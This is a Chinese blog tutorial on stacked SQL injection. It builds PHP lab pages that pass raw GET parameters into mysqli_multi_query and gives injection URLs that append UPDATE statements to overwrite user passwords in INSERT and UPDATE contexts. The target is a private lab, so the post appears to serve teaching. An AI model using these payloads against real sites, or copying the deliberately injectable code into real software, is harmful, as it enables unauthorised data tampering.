sql堆叠注入

最新推荐文章于 2024-10-09 20:57:36 发布
最新推荐文章于 2024-10-09 20:57:36 发布
阅读量120 收藏
点赞数 2
分类专栏: 网络安全 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhuge_long/article/details/142758786
版权

准备知识:

  • php中multi_query():一次可以执行多个sql语句
  • 比如:查询注入id=1;update xxx;

定义:如果后端代码中,数据库执行的方法是multi_query(),那么就可以一次执行多个sql,也就可以支持堆叠注入了。

准备靶场:

<?php

$id=$_GET['id'];

$conn=mysqli_connect("192.168.190.133", "root", "123456", "crm",3306);
mysqli_query($conn, "set name utf8");

$sql="insert into userinfo(id) values($id)";
$res=mysqli_multi_query($conn, $sql) or die(mysqli_error($conn));
if($res){
    echo "yes";
}else{
    echo "no";
};
?>

验证:

image-20240604142345255

准备sql注入:

http://192.168.190.133/wh067/08-sqli/demo1.php?id=2;update userinfo set password = '123' where id=2;

结果:

image-20240604142827248

如果是更新注入类型:insert

靶场:

<?php

$id=$_GET['id'];

$conn=mysqli_connect("192.168.190.133", "root", "123456", "crm",3306);
mysqli_query($conn, "set name utf8");

// $sql="select * from userinfo where id=$id";
$sql="insert into userinfo(id) values($id)";
$res=mysqli_multi_query($conn, $sql) or die(mysqli_error($conn));
if($res){
    echo "yes";
}else{
    echo "no";
};
?>

注入sql

http://192.168.190.133/wh067/08-sqli/demo1.php?id=11);update userinfo set password = '666' where id=2;-- -)

如果是更新注入类型:update

靶场:

<?php

$id=$_GET['id'];
$account=$_GET['account'];

$conn=mysqli_connect("192.168.190.133", "root", "123456", "crm",3306);
mysqli_query($conn, "set name utf8");

// $sql="select * from userinfo where id=$id";
// $sql="insert into userinfo(id) values($id)";
$sql="update userinfo set account='$account' where id=$id";

$res=mysqli_multi_query($conn, $sql) or die(mysqli_error($conn));
if($res){
    echo "yes";
}else{
    echo "no";
};
?>

蜗牛学苑_武汉
关注
专栏目录
SQL 注入天书.pdf
08-06
随着挑战难度的提升,学习者将接触到更复杂的注入技术,如联合查询注入堆叠查询注入、 outfile 和 load_file 函数的使用等。此外,还将学习如何防御SQL注入,例如使用参数化查询、预编译语句和输入验证等方法。 ...
sql注入靶场.zip
06-24
它模拟了各种类型的SQL注入漏洞,包括但不限于错误基线注入、时间基线注入、盲注、联合查询注入堆叠查询注入等。每个挑战都设计有特定的注入点,需要利用这些点来获取敏感信息,例如数据库中的用户名、密码或其他...
SQL注入实例讲解
03-29
2. **攻击方法**:展示不同的SQL注入技术,如盲注(基于错误或时间延迟)、联合查询注入堆叠查询注入等。 3. **数据泄露**:解释攻击者如何利用注入获取敏感信息,如用户密码、个人信息等。 4. **权限提升**:...
SQL注入天书 sqli-labs
01-11
5. **堆叠查询注入**:通过构造多条查询语句并用分号分隔,一次性执行多个查询。 6. **信息收集**:学习如何获取数据库版本、表名、列名等敏感信息,为后续攻击铺平道路。 7. **OS命令注入**:在某些情况下,SQL...
sql注入工具
11-27
5. **堆叠查询注入**:通过将多个SQL语句堆叠在一起,攻击者可以执行一系列操作。 `domian`这个工具可能包含以下功能: 1. **自动检测**:扫描Web应用程序,寻找可能的SQL注入点。 2. ** payload生成**:生成各种...
掌握嵌套子查询:复杂 SQL 中 * 列的准确表列关系
学习之余随便记记
10-05 871
本文重点讨论在具有 * 列的嵌套子查询中建立表和列之间正确关系的挑战。使用 Teradata SQL 代码示例来说明该过程。本文聚焦于一个别名为 SUBSCRIBER_ 的子查询及其派生的列,这些列在外层查询中被使用。有些列在子查询的选择列表中被明确列出,而其他一些列则来自一个列(SUBSCR.),这个*列引用了 PRD2_ODW.SUBSCRIBER_ 表。接着,分析检查了外层查询的选择列表,特别是来自 SUBSCRIBER_ 子查询的列。
PostgreSQL常用数值处理函数简介
lunan的博客
10-04 621
这些数值处理函数提供了丰富的数值计算功能,从简单的数学操作到更高级的科学计算,满足了大多数数据库操作中的数值处理需求。
如何在 SQL 中插入一条新记录 ?
程序员学习园地。
10-06 363
在日常的软件开发过程中,我们经常需要与数据库进行交互,其中一项常见的操作就是向数据库表中插入新的数据。SQL 语言提供了语句来实现这个功能。下面我会以通俗易懂的方式介绍如何使用这条命令,并提供一些实际开发中的建议和注意事项。
SQL之case when then用法
GDFHGFHGFH的博客
10-09 410
简单类型case sexwhen '1' then '男'when '2' then '女’else '其他' end搜索类型SELECTname,salary,CASEFROMemployees;CASE 语句是顺序敏感的,即它会从上到下评估 WHEN 子句,一旦找到第一个为真的条件,就会返回相应的结果,并忽略后面的所有条件。ELSE 子句是可选的。如果没有任何 WHEN 条件为真,并且没有提供 ELSE 子句,那么 CASE 表达式的结果将是 NULL。
SQL进阶技巧:如何优雅求解指标累计去重问题?
石榴姐yyds
10-02 874
本文给出了计算指标按照日期字段进行累计去重的优雅解法,文中采用了2种解法,一种借助于分析函数作为辅助变量生成状态标记求解,一种利用自关联生成全量数据进行行行比较求解,两种方式都非常巧妙。
SQL第13课挑战题
m0_47482290的博客
10-07 350
5. 列出供应商(vendors表中的vend_id)及其可供产品的数量,包括没有产品的供应商。3. 使用outer join联结products表和orderitems表,返回产品名称(prod_name)和与之相关的订单号(order_num)的列表,并按商品名称排序。1. 使用inner join,以检索每个顾客的名称(customers表中的cust_name)和所有的订单号(orders表中的order_num).4. 修改上一题中创建的SQL语句,使其返回每一项产品的总订单数(不是订单号)。
SQL优化 where谓词条件is null优化
kiwixing的博客
10-06 398
OBJECT_NAME字段索引范围范围,回表过滤SUBOBJECT_NAME is null,逻辑读7。注意,null字段在索引第一列,也能使用到索引,但需要索引扫描后走filter,null不参与排序。3.创建复合索引,包含SUBOBJECT_NAME is null条件字段。1.创建测试表及谓词条件中包含is null模拟语句。索引范围扫描,无需回表过滤,逻辑读4。3.创建等值谓词条件的单列索引。2.全表扫描逻辑读1237。
SQL自学:什么是SQL的聚集函数,如何利用它们汇总表的数据
Nervousr的博客
10-03 995
SQL(Structured Query Language,结构化查询语言)中,聚集函数也称为聚合函数,是对一组值进行计算并返回单一值的函数。
DBMS-3.2 SQL(2)——DML的SELECT(含WHERE、聚集函数、GROUP BY、HAVING之间的关系)
m0_73249076的博客
10-06 1082
DML中的SELECT概述。
力扣SQL数据库(1098~1132)
最新发布
weixin_65642229的博客
10-09 358
编写解决方案,筛选出过去一年中订单总量 少于 10 本 的 书籍,并且 不考虑 上架距今销售 不满一个月 的书籍。假设今天是 2019-06-23。编写解决方案,找出从今天起最多 90 天内,每个日期该日期首次登录的用户数。编写解决方案,找出每位学生获得的最高成绩和它所对应的科目,若科目成绩并列,取。编写解决方案,统计在被报告为垃圾广告的帖子中,被移除的帖子的每日平均占比,编写解决方案,针对每个举报原因统计昨天的举报帖子数量。使用桌面端和手机端的用户人数和总支出金额。的具有该事件的所有公司的。
SQL Server—表格详解
qq_3517289697的博客
10-02 897
- 小提示: delete删除的时候比truncate删除的更快 -- delete删除的时候 不允许这条记录被外键引用,可以先把外键的关系删除掉,再进行删除这条数据 -- truncate 要求删除的表不能有外键的约束。-- 条件查询 : 查询年龄等于23的 select 列名, 列名 from 表名 where Age = 23。点击数据库 --> 点开使用的数据看 --> 右键击表 --> 新建表。-- 注意: 列名之间使用逗号隔开,值和列名一一对应,类型也得匹配。-- 查询满足条件的所有列。
【PostgreSQL】提高篇——深入讨论约束(如 NOT NULL、CHECK、FOREIGN KEY)的使用及其对数据完整性的影响
thinking_chou的专栏
10-02 868
约束在数据库设计中起着至关重要的作用。通过使用NOT NULLCHECK和约束,可以有效地维护数据完整性、实施业务规则、减少错误和提高性能。了解这些约束的使用和影响,可以帮助开发者设计出更健壮和可靠的数据库系统。
SQL】掌握SQL查询技巧:数据分组与排序
人生苦短,睡觉要紧,睡醒再说
10-08 982
GROUP BY子句用于将来自SELECT查询的数据行分组,通常与聚合函数(如COUNTSUMAVGMAX和MIN)一起使用,以便对每个组执行计算。这种分组使我们能够对数据进行汇总分析,提取有用的信息。ORDER BY子句用于对查询结果进行排序。默认情况下,排序是升序的,但可以使用DESC关键字指定降序排序。这有助于用户根据特定的需求查看数据。通过掌握GROUP BY和ORDER BY子句,你可以有效地分析和整理 SQL 查询的结果。无论是进行数据汇总还是结果排序,这两者都是数据分析中不可或缺的工具。
SQL第12课——联结表
m0_47482290的博客
10-06 1278
Vendors表包含所有供应商信息,每个供应商占一行,具有唯一的标识,此标识称为主键(primary key).可以是供应商ID或任何其他唯一值。相应的笛卡儿积不是我们想要的,返回的数据用每个供应商匹配了每个产品,包括了供应商不正确的产品(即使供应商根本就没有产品)Products表只存储产品信息,除了存储供应商ID(Vendors表的主键)外,不存储其他有关供应商的信息。一个产品目录的数据库表,一类物品占一行,每一行对物品的介绍包含:产品描述,价格,以及生产该产品的供应商。vend_name来自一个表;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值